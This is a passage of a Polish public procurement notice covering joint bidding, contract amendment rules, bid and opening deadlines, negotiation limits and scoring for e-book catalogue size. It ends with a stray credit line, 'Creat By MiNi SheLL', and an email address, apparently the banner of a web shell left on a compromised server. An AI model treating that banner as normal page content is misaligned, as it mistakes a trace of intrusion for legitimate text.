1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/><br/>2.	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/><br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania na podstawie przesłanek, o których mowa w rozdz. VI swz.<br/><br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w rodz. VIII ust. I pkt 1 i 2 swz składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie, którego wzór stanowi Załącznik nr 1 do swz, potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków <br/>udziału w postępowaniu.<br/><br/>5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać <br/>na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są <br/>wymagane. <br/><br/>6. W przypadku, o którym mowa w ust. 5, Wykonawcy wspólnie ubiegający się o udzielenie <br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy – załącznik nr 2 do swz. <br/><br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/><br/>8.	W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	Zamawiający żąda umowy regulującej współpracę tych Wykonawców przed podpisaniem umowy w sprawie zamówienia publicznego,<br/>2)	Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy. <br/>2.	Zmiany umowy wymagają formy pisemnej lub elektronicznej z podpisem kwalifikowanym pod rygorem nieważności i dopuszczalne są zgodnie z art. 455 ustawy Pzp w następujących przypadkach:<br/>1)	Strony są uprawnione do dokonania zmian umowy o łącznej wartości mniejszej niż progi unijne oraz niższej niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy;<br/>2)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy – w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;<br/>3)	w przypadku, gdy zmiana nie prowadzi do zmiany charakteru umowy i zostały spełnione łącznie następujące warunki: <br/>a)	konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć;<br/>b)	wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie.<br/><br/>4)	w przypadkach zmian uznanych za nieistotne, w szczególności:<br/>a)	wystąpienie omyłek pisarskich i rachunkowych;<br/>b)	zmiany formy organizacyjnej Wykonawcy;<br/>c)	zmiany personalne oraz osób nadzorujących wykonanie przedmiotu umowy;<br/>d)	zmiany obowiązujących przepisów prawa;<br/>e)	inne, które nie będą w sposób istotny ingerować w przedmiot umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający, w celu ograniczenia liczby wykonawców zapraszanych do negocjacji ofert, zastosuje kryterium oceny ofert:<br/>cena brutto. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA:<br/>Z postępowania o udzielenie zamówienia wyklucza się również Wykonawcę, w stosunku do którego zachodzi okoliczność<br/>wskazana w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 poz. 835) - zgodnie z<br/>zapisami swz.<br/><br/>TERMIN REALIZACJI:<br/>Termin wykonania zamówienia: do dnia wyczerpania limitu stron oferowanych wydawnictw (8 milionów) - nie dłużej jednak niż przez okres 12 miesięcy od dnia wejścia umowy w życie.<br/>UWAGA:<br/>Umowa będzie obowiązywać nie wcześniej niż od dnia 01.01.2025r.<br/><br/>KRYTERIUM JAKOŚCIOWE:<br/>Zamawiający dokona oceny tego kryterium na podstawie złożonego przez Wykonawcę oświadczenia w Formularzu ofertowym, w którym Wykonawca wskaże do ilu publikacji literatury pięknej oraz literatury faktu w formie e-book (w języku polskim) zapewni czytelnikom w okresie realizacji zamówienia.<br/><br/>Ocenie będzie podlegać liczba publikacji literatury pięknej oraz literatury faktu w formie e-book jaką Wykonawca zapewni czytelnikom w okresie realizacji zamówienia - powyżej minimum określonego przez Zamawiającego w rozdz. IV ust. 2 pkt 2 swz.<br/><br/>Punkty będą przyznawane w następującej wysokości:<br/>1)	gdy Wykonawca zapewni czytelnikom dostęp do minimum 30 tys. publikacji literatury pięknej oraz literatury faktu w formie e-book w czasie realizacji zamówienia - 0 pkt<br/>2)	gdy Wykonawca zapewni czytelnikom dostęp od 31 tys. do 40 tys. publikacji literatury pięknej oraz literatury faktu w formie e-book w czasie realizacji zamówienia - 20 pkt<br/>3)	gdy Wykonawca zapewni czytelnikom dostęp do 41 tys. do 50 tys. publikacji literatury pięknej oraz literatury faktu w formie e-book w czasie realizacji zamówienia – 40 pkt<br/>Szczegółowy opis w swz.

Creat By MiNi SheLL
Email: jattceo@gmail.com